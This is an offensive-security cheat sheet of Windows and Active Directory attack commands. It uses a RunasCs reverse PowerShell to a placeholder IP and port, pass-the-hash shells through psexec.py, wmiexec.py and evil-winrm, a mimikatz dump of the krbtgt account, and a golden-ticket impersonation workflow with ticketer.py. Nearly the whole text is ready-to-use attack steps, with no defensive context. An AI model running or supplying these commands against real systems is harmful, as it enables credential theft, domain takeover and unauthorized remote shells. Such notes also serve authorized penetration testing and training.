// pivot locally
RunasCS : https://github.com/antonioCoco/RunasCs/tree/master

PS C:\Users\svc_apache\Desktop> .\runas.exe <user> <password> powershell -r <ip>:<port>
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-59b6e$\Default
[+] Async process 'powershell' with pid 2380 created and left in background.

// Get a shell on the remote machine passing the hash
psexec.py '<domain>/<user>@<domain-ip>' -hashes '<ntlm_hash>'  cmd.exe

// Get a shell on the remote machine passing the hash
wmiexec.py '<domain>/<user>@<dc-ip>' -hashes '<ntlm_hash>' cmd.exe

// Get a shell via WinRM with credentials - port 5985
evil-winrm -u "<user>" -p "<password>" -i "<machine or dc ip>"

// Get a shell via WinRM with hash- port 5985
evil-winrm -u "<user>" -H "<ntlml hash>" -i "<machine or dc ip>"

// ON WINDOWS MACHINE
mimikatz.exe
lsadump::lsa /inject /name:krbtgt
//copy all data dumped like in the image.
ticketer.py -nthash <ntlm_hash> -domain-sid <domain-sid> -domain <dc-name> <username-to-impersonate>
export KRB5CCNAME="<FULL-PATH-TO-CCACHE-FILE>"
psexec.py -n -k <dc-name>/<user>@<computer-name> cmd.exe